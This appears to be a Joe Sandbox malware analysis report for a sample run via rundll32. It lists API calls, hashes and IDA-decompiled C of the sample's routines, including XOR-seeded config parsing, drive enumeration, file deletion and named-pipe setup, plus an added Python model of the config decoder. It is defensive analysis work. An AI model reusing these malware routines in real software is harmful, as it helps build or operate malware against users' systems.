                                            • Instruction ID: 9e3138ff8555976af1dffc42edc6ee42f7cd99b79d405015dcbf68b5d7944ce6
                                            • Opcode Fuzzy Hash: cb0e39f678f8567584d371bfbe47e2b57e6e0d16d73476a93db6a3c70dc166cb
                                            • Instruction Fuzzy Hash: 9CF1D379B24215AF9BA0FBBACC8DA6F6BDD6B482107159820FC03D7280DE74ED41C755
                                            Uniqueness

                                            Uniqueness Score: -1.00%
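
Added example (Python), not code from the sample or from Joe Sandbox, modelled on the routine above (ten StrToIntExA calls with dwFlags 0) and on E049F475F, decompiled further down this page, which is the same pattern seen in the 049F0000 mapping: a global DWORD at 0x49fa344 (0x69b25f44 in this sample) is XORed with a fixed constant for every field before the lookup helper is called, the first block is kept only when its size is at least 0x110, a missing second block yields return value 2, and each integer global is written only when StrToIntExA succeeds. The XOR constants are taken from E049F475F; the field names, the block table, and the string values are constructed, and the real container format is not shown in the report, so a plain dict stands in for the lookup helpers E049F4556/E049F296E. The StrToIntExA model is simplified to decimal-only input.

```python
from typing import Dict, Optional

SEED = 0x69B25F44  # DWORD the decompiler reports at 0x49fa344 for this sample

# XOR constants from E049F475F in call order; the field names are assumptions.
FIELD_CONSTANTS = {
    "block_a": 0x889A0120,   # result kept only when its size is >= 0x110
    "block_b": 0x0159E6C7,   # required; a missing block gives return value 2
    "strings": 0xE60382A5,   # container the integer fields are read from
    "int_1": 0x7895433B,     # stored at 0x49fa2e0 in the decompilation
    "int_2": 0x219B08C7,     # stored at 0x49fa2e4
    "int_3": 0x31FC0661,
}


def effective_id(const: int, seed: int = SEED) -> int:
    """The value actually handed to the lookup helper: seed ^ constant."""
    return (seed ^ const) & 0xFFFFFFFF


def effective_ids(seed: int = SEED) -> Dict[str, int]:
    """All field IDs for a given seed; these are what to grep for in a dump."""
    return {name: effective_id(c, seed) for name, c in FIELD_CONSTANTS.items()}


def str_to_int_ex_a(s: str) -> Optional[int]:
    """Simplified model of SHLWAPI StrToIntExA with dwFlags=0 (STIF_DEFAULT):
    optional leading whitespace and sign, then decimal digits only; "0x.." is
    not accepted without STIF_SUPPORT_HEX. None stands for the API's FALSE."""
    t = s.lstrip(" \t")
    neg = t.startswith("-")
    if t[:1] in ("+", "-"):
        t = t[1:]
    if not t or not (t.isascii() and t.isdigit()):
        return None
    v = int(t)
    return -v if neg else v


def resolve_config(blocks: Dict[int, object], seed: int = SEED) -> dict:
    """Walk the fields in the order E049F475F does.

    `blocks` maps effective IDs to blobs (bytes) or, for the strings container,
    to a dict of effective ID -> str (stand-in for E049F296E). Integer values are
    recorded only when str_to_int_ex_a succeeds, mirroring the guarded stores."""
    ids = effective_ids(seed)
    out = {"status": 0, "values": {}}

    blk = blocks.get(ids["block_a"])
    if isinstance(blk, bytes) and len(blk) >= 0x110:   # size guard from the decompilation
        out["values"]["block_a"] = blk

    if ids["block_b"] not in blocks:
        out["status"] = 2                               # _v12 = 2; return _v12
        return out

    strings = blocks.get(ids["strings"])
    if strings is None:
        out["status"] = None   # decompilation frees block_b and returns whatever the failed lookup left in _v12
        return out

    for name in ("int_1", "int_2", "int_3"):
        s = strings.get(ids[name]) if isinstance(strings, dict) else None
        if s is None:
            continue
        v = str_to_int_ex_a(s)
        if v is not None:
            out["values"][name] = v
    return out


def demo_blocks() -> Dict[int, object]:
    """Constructed table, not from the sample: one undersized block, one required
    block, and three string fields of which only two parse as decimal integers."""
    ids = effective_ids()
    return {
        ids["block_a"]: b"\x00" * 0x10F,   # one byte short of 0x110: dropped
        ids["block_b"]: b"present",
        ids["strings"]: {ids["int_1"]: " 300", ids["int_2"]: "0x10", ids["int_3"]: "-7"},
    }
```

The effective IDs are stable per build (they depend only on the seed and the constants), so listing them with effective_ids() gives a quick way to locate the same fields in another dump of this sample, while the guarded-store behaviour explains why a config entry that is present but not a plain decimal leaves the corresponding global untouched.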

                                            APIs
                                            • wcscpy.NTDLL ref: 0580594F
                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0580595B
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580596C
                                            • memset.NTDLL ref: 05805989
                                            • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 05805997
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 058059A5
                                            • GetDriveTypeW.KERNEL32(?), ref: 058059B3
                                            • lstrlenW.KERNEL32(?), ref: 058059BF
                                            • wcscpy.NTDLL ref: 058059D1
                                            • lstrlenW.KERNEL32(?), ref: 058059EB
                                            • HeapFree.KERNEL32(00000000,?), ref: 05805A04
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                            • String ID:
                                            • API String ID: 3888849384-0
                                            • Opcode ID: e2ee2981d8b29f320d083734b7c4a8a16c1d2ffced19f9593194a8d3337c5b2e
                                            • Instruction ID: aa27f3c51a918d956b6ad16d040b9e03c8a6779b2ce5daf431ccef70c9b6aa34
                                            • Opcode Fuzzy Hash: e2ee2981d8b29f320d083734b7c4a8a16c1d2ffced19f9593194a8d3337c5b2e
                                            • Instruction Fuzzy Hash: C2312C7291010CBFDF51ABA4EC89CEE7FBDEB08324B108456F905E2160DB35AE458F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E049F475F(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                            				int _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				signed int _t28;
                                            				signed int _t33;
                                            				signed int _t39;
                                            				char* _t45;
                                            				char* _t46;
                                            				char* _t47;
                                            				char* _t48;
                                            				char* _t49;
                                            				char* _t50;
                                            				void* _t51;
                                            				void* _t52;
                                            				void* _t53;
                                            				intOrPtr _t54;
                                            				void* _t56;
                                            				intOrPtr _t57;
                                            				intOrPtr _t58;
                                            				signed int _t61;
                                            				intOrPtr _t64;
                                            				signed int _t65;
                                            				signed int _t70;
                                            				void* _t72;
                                            				void* _t73;
                                            				signed int _t75;
                                            				signed int _t78;
                                            				signed int _t82;
                                            				signed int _t86;
                                            				signed int _t90;
                                            				signed int _t94;
                                            				signed int _t98;
                                            				void* _t101;
                                            				void* _t102;
                                            				void* _t115;
                                            				void* _t118;
                                            				intOrPtr _t121;
                                            
                                            				_t118 = __esi;
                                            				_t115 = __edi;
                                            				_t104 = __ecx;
                                            				_t101 = __ebx;
                                            				_t28 =  *0x49fa344; // 0x69b25f44, global DWORD XORed into every field constant below before the lookup
                                            				if(E049F4556( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) { // lookup by seeded ID; kept only if the returned size is at least 0x110
                                            					 *0x49fa378 = _v8;
                                            				}
                                            				_t33 =  *0x49fa344; // 0x69b25f44
                                            				if(E049F4556( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) { // required block missing: return 2
                                            					_v12 = 2;
                                            					L69:
                                            					return _v12;
                                            				}
                                            				_t39 =  *0x49fa344; // 0x69b25f44
                                            				_push(_t115);
                                            				if(E049F4556( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) { // strings container; on failure _v16 is freed at L67 and _v12 returned as the lookup left it
                                            					L67:
                                            					HeapFree( *0x49fa2d8, 0, _v16);
                                            					goto L69;
                                            				} else {
                                            					_push(_t101);
                                            					_t102 = _v12;
                                            					if(_t102 == 0) {
                                            						_t45 = 0;
                                            					} else {
                                            						_t98 =  *0x49fa344; // 0x69b25f44
                                            						_t45 = E049F296E(_t104, _t102, _t98 ^ 0x7895433b);
                                            					}
                                            					_push(_t118);
                                            					if(_t45 != 0) {
                                            						_t104 =  &_v8;
                                            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                            							 *0x49fa2e0 = _v8;
                                            						}
                                            					}
                                            					if(_t102 == 0) {
                                            						_t46 = 0;
                                            					} else {
                                            						_t94 =  *0x49fa344; // 0x69b25f44
                                            						_t46 = E049F296E(_t104, _t102, _t94 ^ 0x219b08c7);
                                            					}
                                            					if(_t46 != 0) {
                                            						_t104 =  &_v8;
                                            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                            							 *0x49fa2e4 = _v8;
                                            						}
                                            					}
                                            					if(_t102 == 0) {
                                            						_t47 = 0;
                                            					} else {
                                            						_t90 =  *0x49fa344; // 0x69b25f44
                                            						_t47 = E049F296E(_t104, _t102, _t90 ^ 0x31fc0661);
                                            					}
                                            					if(_t47 != 0) {
                                            						_t104 =  &_v8;
                                            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                            							 *0x49fa2e8 = _v8;
                                            						}
                                            					}
                                            					if(_t102 == 0) {
                                            						_t48 = 0;
                                            					} else {
                                            						_t86 =  *0x49fa344; // 0x69b25f44
                                            						_t48 = E049F296E(_t104, _t102, _t86 ^ 0x0cd926ce);
                                            					}
                                            					if(_t48 != 0) {
                                            						_t104 =  &_v8;
                                            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                            							 *0x49fa004 = _v8;
                                            						}
                                            					}
                                            					if(_t102 == 0) {
                                            						_t49 = 0;
                                            					} else {
                                            						_t82 =  *0x49fa344; // 0x69b25f44
                                            						_t49 = E049F296E(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                                            					}
                                            					if(_t49 != 0) {
                                            						_t104 =  &_v8;
                                            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                            							 *0x49fa02c = _v8;
                                            						}
                                            					}
                                            					if(_t102 == 0) {
                                            						_t50 = 0;
                                            					} else {
                                            						_t78 =  *0x49fa344; // 0x69b25f44
                                            						_t50 = E049F296E(_t104, _t102, _t78 ^ 0x2878b929);
                                            					}
                                            					if(_t50 == 0) {
                                            						L41:
                                            						 *0x49fa2ec = 5;
                                            						goto L42;
                                            					} else {
                                            						_t104 =  &_v8;
                                            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                            							goto L41;
                                            						} else {
                                            							L42:
                                            							if(_t102 == 0) {
                                            								_t51 = 0;
                                            							} else {
                                            								_t75 =  *0x49fa344; // 0x69b25f44
                                            								_t51 = E049F296E(_t104, _t102, _t75 ^ 0x261a367a);
                                            							}
                                            							if(_t51 != 0) {
                                            								_push(_t51);
                                            								_t72 = 0x10;
                                            								_t73 = E049F3A24(_t72);
                                            								if(_t73 != 0) {
                                            									_push(_t73);
                                            									E049F3F7E();
                                            								}
                                            							}
                                            							if(_t102 == 0) {
                                            								_t52 = 0;
                                            							} else {
                                            								_t70 =  *0x49fa344; // 0x69b25f44
                                            								_t52 = E049F296E(_t104, _t102, _t70 ^ 0xb9d404b2);
                                            							}
                                            							if(_t52 != 0 && E049F3A24(0, _t52) != 0) {
                                            								_t121 =  *0x49fa3cc; // 0x4f795b0
                                            								E049F68F5(_t121 + 4, _t68);
                                            							}
                                            							if(_t102 == 0) {
                                            								_t53 = 0;
                                            							} else {
                                            								_t65 =  *0x49fa344; // 0x69b25f44
                                            								_t53 = E049F296E(_t104, _t102, _t65 ^ 0x3df17130);
                                            							}
                                            							if(_t53 == 0) {
                                            								L59:
                                            								_t54 =  *0x49fa348; // 0x57d5a8
                                            								_t22 = _t54 + 0x49fb252; // 0x616d692f
                                            								 *0x49fa374 = _t22;
                                            								goto L60;
                                            							} else {
                                            								_t64 = E049F3A24(0, _t53);
                                            								 *0x49fa374 = _t64;
                                            								if(_t64 != 0) {
                                            									L60:
                                            									if(_t102 == 0) {
                                            										_t56 = 0;
                                            									} else {
                                            										_t61 =  *0x49fa344; // 0x69b25f44
                                            										_t56 = E049F296E(_t104, _t102, _t61 ^ 0xd2079859);
                                            									}
                                            									if(_t56 == 0) {
                                            										_t57 =  *0x49fa348; // 0x57d5a8
                                            										_t23 = _t57 + 0x49fb791; // 0x6976612e
                                            										_t58 = _t23;
                                            									} else {
                                            										_t58 = E049F3A24(0, _t56);
                                            									}
                                            									 *0x49fa3e0 = _t58;
                                            									HeapFree( *0x49fa2d8, 0, _t102);
                                            									_v12 = 0;
                                            									goto L67;
                                            								}
                                            								goto L59;
                                            							}
                                            						}
                                            					}
                                            				}
                                            			}


                                            APIs
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F4804
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F4836
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F4868
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F489A
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F48CC
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F48FE
                                            • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 049F49FD
                                            • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 049F4A11
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
• Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: d05b8807500ac208e270f188330bd49e94e410948ee85bd7c301518f55379ea3
                                            • Instruction ID: 3870638d1ebadae7e89f81e7e9eab7d8ce4575b5b14c24bffb2164cf77f32215
                                            • Opcode Fuzzy Hash: d05b8807500ac208e270f188330bd49e94e410948ee85bd7c301518f55379ea3
                                            • Instruction Fuzzy Hash: CB816F70B14204ABDB10EBB8DE84D6F7BEDEBA87147640975E605E3604F679FD808B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05803AA7: ExpandEnvironmentStringsW.KERNEL32(73E806E0,00000000,00000000,73E806E0,?,80000001,05818CB5,?,73E806E0,0580407B,?,?,00000000,?), ref: 05803AB8
                                              • Part of subcall function 05803AA7: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,05818CB5,?,73E806E0,0580407B,?,?,00000000,?), ref: 05803AD5
                                            • FreeLibrary.KERNEL32(?), ref: 0580CF57
                                              • Part of subcall function 05810F11: lstrlenW.KERNEL32(?,00000000,?,?,?,0580CE9C,?,?), ref: 05810F1E
                                              • Part of subcall function 05810F11: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0580CE9C,?,?), ref: 05810F47
                                              • Part of subcall function 05810F11: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 05810F67
                                              • Part of subcall function 05810F11: lstrcpyW.KERNEL32(-00000002,?), ref: 05810F83
                                              • Part of subcall function 05810F11: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0580CE9C,?,?), ref: 05810F8F
                                              • Part of subcall function 05810F11: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0580CE9C,?,?), ref: 05810F92
                                              • Part of subcall function 05810F11: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0580CE9C,?,?), ref: 05810F9E
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05810FBB
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05810FD5
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05810FEB
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05811001
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05811017
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 0581102D
                                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0580CEAD
                                            • lstrlenW.KERNEL32(?), ref: 0580CEC9
                                            • lstrlenW.KERNEL32(?), ref: 0580CEE1
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0580CEFA
                                            • lstrcpyW.KERNEL32(00000002), ref: 0580CF0F
                                              • Part of subcall function 0580414B: lstrlenW.KERNEL32(?), ref: 0580415B
                                              • Part of subcall function 0580414B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 0580417D
                                              • Part of subcall function 0580414B: lstrcpyW.KERNEL32(00000000,?), ref: 058041A9
                                              • Part of subcall function 0580414B: lstrcatW.KERNEL32(00000000,?), ref: 058041BC
                                            • FindNextFileW.KERNEL32(?,00000010), ref: 0580CF37
                                            • FindClose.KERNEL32(00000002), ref: 0580CF45
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                            • String ID:
                                            • API String ID: 1209511739-0
                                            • Opcode ID: 98ad7d0bc7f7eddfc94de72dd9586da78e600c389dd1b0a42fa60556b63557fc
                                            • Instruction ID: 361b122c2ee962a5c245aa97bd0b01576fbef586321cde7216268767a9a630e4
                                            • Opcode Fuzzy Hash: 98ad7d0bc7f7eddfc94de72dd9586da78e600c389dd1b0a42fa60556b63557fc
                                            • Instruction Fuzzy Hash: 6F4158721083059BD711EF65DC49A2FFBE8FB88B05F004A29F995E2190DB31DD088BA3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(?), ref: 0580FCD8
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0580FD41
                                            • lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 0580FD69
                                            • RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0580FDBB
                                            • DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0580FDC6
                                            • FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0580FDD9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                            • String ID:
                                            • API String ID: 499515686-0
                                            • Opcode ID: 63e8a63f9b1282973e9a3c649cdd71c441f42f8b246827ba1b9676177c5c4f05
                                            • Instruction ID: edad845e3200db9b9b92df5b79964c766f8cf9157ac5a6f01c5283bb7c4ed087
                                            • Opcode Fuzzy Hash: 63e8a63f9b1282973e9a3c649cdd71c441f42f8b246827ba1b9676177c5c4f05
                                            • Instruction Fuzzy Hash: 7D41277190020AEBDF61AFA4DC49AAEBFB9FF04314F109065EE11E61A0DB709E85DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,05804E94), ref: 0580A533
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A552
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A567
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A57D
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A593
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A5A9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$AllocateHeapLibraryLoad
                                            • String ID:
                                            • API String ID: 2486251641-0
                                            • Opcode ID: 3608728cac86d843750b30b3bf6515b594661e98fbe000eb89d37e97cc7f14b0
                                            • Instruction ID: 5eb06553b390bb293071d335b85dc669f643e091de62072d219516806a998eaa
                                            • Opcode Fuzzy Hash: 3608728cac86d843750b30b3bf6515b594661e98fbe000eb89d37e97cc7f14b0
                                            • Instruction Fuzzy Hash: C61130B12117079FAB20AFAADC85CA6BFECBF142517059426FD46C7251DB38EC40CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 05807A40
                                              • Part of subcall function 0581AD9E: RtlNtStatusToDosError.NTDLL(00000000), ref: 0581ADD6
                                              • Part of subcall function 0581AD9E: SetLastError.KERNEL32(00000000), ref: 0581ADDD
                                            • GetLastError.KERNEL32(?,00000318,00000008), ref: 05807B50
                                              • Part of subcall function 058029B2: RtlNtStatusToDosError.NTDLL(00000000), ref: 058029CA
                                            • memcpy.NTDLL(00000218,058232B0,00000100,?,00010003,00001003,?,00000318,00000008), ref: 05807ACF
                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 05807B29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$Status$Last$memcpymemset
                                            • String ID:
                                            • API String ID: 945571674-3916222277
                                            • Opcode ID: ba8c72387275b577848a8e2a95d7e25dd9d2689981d0b08283c55bc4802d2709
                                            • Instruction ID: 8e5d9fa7d5eb2a9efc760c50011c56230f9bc99effcf85ad8f988e7c3674059e
                                            • Opcode Fuzzy Hash: ba8c72387275b577848a8e2a95d7e25dd9d2689981d0b08283c55bc4802d2709
                                            • Instruction Fuzzy Hash: 18318571A01309AFDB60DF54CD99BAABBB9FB04204F10456AED56D7181EB30BE448B50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$memcpy
                                            • String ID:
                                            • API String ID: 368790112-0
                                            • Opcode ID: 723a6d5780d8cbf77dc7e35cf79307f2f9382ea5bb884a50c696cec9f40996b7
                                            • Instruction ID: 1b78ae15009c3aad08146faa85795f506ab1c1f2f9810628450b274b3adb8a85
                                            • Opcode Fuzzy Hash: 723a6d5780d8cbf77dc7e35cf79307f2f9382ea5bb884a50c696cec9f40996b7
                                            • Instruction Fuzzy Hash: 96F1DE30604B99DFCB71CB68C898AAABBF4BF41704F14596DC9E7C7682D231AA45CF10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F515F(intOrPtr _a4) {
                                            				void* _t2;
                                            				unsigned int _t4;
                                            				void* _t5;
                                            				long _t6;
                                            				void* _t7;
                                            				void* _t15;
                                            
                                            				_t2 = CreateEventA(0, 1, 0, 0);
                                            				 *0x49fa30c = _t2;
                                            				if(_t2 == 0) {
                                            					return GetLastError();
                                            				}
                                            				_t4 = GetVersion();
                                            				if(_t4 != 5) {
                                            					L4:
                                            					if(_t15 <= 0) {
                                            						_t5 = 0x32;
                                            						return _t5;
                                            					}
                                            					L5:
                                            					 *0x49fa2fc = _t4;
                                            					_t6 = GetCurrentProcessId();
                                            					 *0x49fa2f8 = _t6;
                                            					 *0x49fa304 = _a4;
                                            					_t7 = OpenProcess(0x10047a, 0, _t6);
                                            					 *0x49fa2f4 = _t7;
                                            					if(_t7 == 0) {
                                            						 *0x49fa2f4 =  *0x49fa2f4 | 0xffffffff;
                                            					}
                                            					return 0;
                                            				}
                                            				if(_t4 >> 8 > 0) {
                                            					goto L5;
                                            				}
                                            				_t15 = _t4 - _t4;
                                            				goto L4;
                                            			}
                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,049F3D54,?), ref: 049F5167
                                            • GetVersion.KERNEL32 ref: 049F5176
                                            • GetCurrentProcessId.KERNEL32 ref: 049F5192
                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 049F51AF
                                            • GetLastError.KERNEL32 ref: 049F51CE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
• Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                            • String ID:
                                            • API String ID: 2270775618-0
                                            • Opcode ID: 42640018cf60fe61f748347959b7099e345fceaede8ace9b32de7b77d79f757d
                                            • Instruction ID: f9fdb1adda6dcb73d2d3c108e4704d00367e0eb6a65b58affac18fe3d4d1bb7c
                                            • Opcode Fuzzy Hash: 42640018cf60fe61f748347959b7099e345fceaede8ace9b32de7b77d79f757d
                                            • Instruction Fuzzy Hash: A1F08CB0748302BBD7244F64AC09F583FA5E704769F124439EA16CA1C1E6B9F840CB18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 058151DE
                                            • lstrlenW.KERNEL32(?), ref: 058151EC
                                            • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 05815217
                                            • lstrcpyW.KERNEL32(00000006,00000000), ref: 05815245
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Query$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3961825720-0
                                            • Opcode ID: f682d1ac7ac777a7898aa01656c9204dc19327e6123b4a2ef001316b7dd488b9
                                            • Instruction ID: 15486d83e0b24f4345906480319f98f245f77eeea74073bc2167a8f36b6a71d9
                                            • Opcode Fuzzy Hash: f682d1ac7ac777a7898aa01656c9204dc19327e6123b4a2ef001316b7dd488b9
                                            • Instruction Fuzzy Hash: 18415A72610209EFDF119F99C885AAEBBACFF44310F108029FD06D6250DB74EE519F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,05829208,00000001), ref: 05804E19
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05804E64
                                              • Part of subcall function 05816B34: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,0580A82F), ref: 05816B4B
                                              • Part of subcall function 05816B34: QueueUserAPC.KERNEL32(00000000,00000000,?,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B60
                                              • Part of subcall function 05816B34: GetLastError.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B6B
                                              • Part of subcall function 05816B34: TerminateThread.KERNEL32(00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B75
                                              • Part of subcall function 05816B34: CloseHandle.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B7C
                                              • Part of subcall function 05816B34: SetLastError.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B85
                                            • GetLastError.KERNEL32(0580C7AE,00000000,00000000,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05804E4C
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05804E5C
